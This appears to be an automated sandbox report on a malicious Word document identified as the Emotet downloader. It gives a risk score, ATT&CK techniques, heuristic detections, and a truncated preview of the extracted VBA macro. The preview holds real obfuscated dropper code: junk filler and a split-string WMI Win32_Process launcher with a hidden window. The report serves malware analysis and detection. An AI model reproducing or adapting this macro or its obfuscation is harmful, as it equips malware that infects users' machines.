MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of legacy auto-exec macros and obfuscated API calls to launch processes via WMI. ClamAV specifically identifies it as Emotet, a known downloader family. The VBA script uses obfuscation techniques and calls to Win32_Process, strongly suggesting its purpose is to download and execute a secondary payload.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6861630-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6861630-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54027 bytes |
SHA-256: 69b7c72fb070ed530636023be36a21512bf33c9f9455a6424a839764d669d447 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "c76189"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O98_63"
Function O879479_()
If M42269 <> Q28408 Then
O_6048 = (73301558)
k913__0 = b025_53_ * 721660429 + w3_4__ + CLng(E_0379)
l_55_5_1 = 149289953 / Hex(z175__68 / Chr(q4167___ - CDate(513507093)) * 616259750 / 740247798) / Y26_604 - Fix(756812418)
z6390_52 = (15128212)
End If
If R4_232 <> v7_77_6 Then
j285_47_ = (654623649)
l69_362 = w2_6_9 * 295143666 + I01838_8 + CLng(C74789_)
B5108__8 = 188324159 / Hex(J___7_ / Chr(J22089 - CDate(756687052)) * 592738394 / 679060146) / q416802 - Fix(9226827)
K106862 = (510169079)
End If
If W45__34_ <> F7_601 Then
J5863201 = (379361940)
k003_38 = j0__871 * 960521750 + r3856541 + CLng(C__26_)
P232753 = 504942687 / Hex(p01__75 / Chr(S4_728 - CDate(332299222)) * 330627682 / 893290600) / X029030_ - Fix(665928665)
u_9453 = (329849628)
End If
If j__55395 <> U__3533 Then
a934_17 = (64449259)
I677259 = k5524_9_ * 713748853 + h826047 + CLng(Q_26_0)
Q__08471 = 205903434 / Hex(a24___09 / Chr(n___90 - CDate(913914017)) * 199311882 / 875112563) / c06_7_2 - Fix(329457708)
Z_84_11 = (371697055)
End If
If z160877 <> K14_86 Then
r4_1632_ = (516277596)
w2_2_6_ = u18418 * 173275792 + F92_94__ + CLng(s4__5__)
w57003 = 38043446 / Hex(Z___4267 / Chr(Z031_4 - CDate(839160335)) * 17092399 / 170062673) / S37__8 - Fix(649743509)
j984699 = (870323211)
End If
If k49_6_0 <> K3612367 Then
Q_4_2_ = (70684428)
C__5__ = b___98__ * 596373992 + P29_5_4 + CLng(V715_7_)
t74_6_0 = 417679645 / Hex(S6185_82 / Chr(T892_61_ - CDate(442593422)) * 996095986 / 127649435) / R_226__4 - Fix(932451939)
P26__96 = (372098297)
End If
If L6___9_ <> w_637_4 Then
t_4630 = (278273830)
V067_6_ = G589_5_8 * 293241615 + v9_506 + CLng(r428_2)
C84130_ = 124231430 / Hex(O4_996_ / Chr(r_1_5_0 - CDate(994034080)) * 653997374 / 36807244) / a500117_ - Fix(255849435)
J3256300 = (763188849)
End If
If T02300 <> O_6__243 Then
A0__72 = (149492458)
H8_185 = Q92793_ * 121629061 + i95_2_3 + CLng(X9311_82)
l_7_0_8 = 246872323 / Hex(b108974 / Chr(V3_256 - CDate(833198370)) * 119662599 / 616748986) / E26_393 - Fix(680288797)
c87177_0 = (396862687)
End If
End Function
Function d2633285(T9_70_39, R_33__)
On Error Resume Next
If Q623_930 <> K235_0_7 Then
X__7328 = (698332333)
G__56423 = m87__6 * 478782407 + c6987669 + CLng(o271__54)
Y8_15__6 = 10263698 / Hex(h2_27856 / Chr(i7392579 - CDate(998252436)) * 620537820 / 123553093) / T_98487 - Fix(980928270)
I2_9_6 = (247364945)
End If
If z6___0_2 <> c44734_3 Then
G_6_7285 = (815257627)
l8_568_3 = u13051 * 10446657 + M98401 + CLng(M02056)
l62_011_ = 895684693 / Hex(M33185_5 / Chr(P34669 - CDate(454831298)) * 101905487 / 426315216) / E_99_46 - Fix(204546263)
R72__299 = (345344497)
End If
If Y7_0___ <> d0136_0 Then
S712_41 = (721534745)
i__00_0 = K1_427 * 244624806 + X2443_9 + CLng(T8804_)
f0_560_ = 501663031 / Hex(a3_901 / Chr(t65912 - CDate(726701727)) * 464592926 / 317865879) / a__29_8 - Fix(239701313)
W4_382 = (753815034)
End If
Set j_3_464_ = GetObject(d5_1_3_0 + "winmgm" + z68_779 + "ts:Win" + "32_Proce" + "ssStartup")
If H65_058 <> Y_4_24 Then
V07134_1 = (528280549)
w2486_94 = s_55_628 * 239136823 + C268_5_ + CLng(k3__5_3)
K8_5_8_2 = 728193341 / Hex(l7513_1_ / Chr(X02_301 - CDate(546982219)) * 15227945 / 908761120) / i118_3__ - Fix(813369194)
Q_4__96 = (908373056)
End If
If n27_1892 <> d9__1_72 Then
w123847 = (39436152)
k46568_7 = f_9_4_9 * 929263402 + d1_71__ + CLng(n29_815)
X7213__ = 136031590 / Hex(z09821 / Chr(X_50982 - CDate(175626204)) * 234876415 / 27506706) / r_9_77 - Fix(263119365)
r0_5_502 = (604377794)
End If
j_3_464_.ShowWindow = 126014 - 126014
If d467_
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.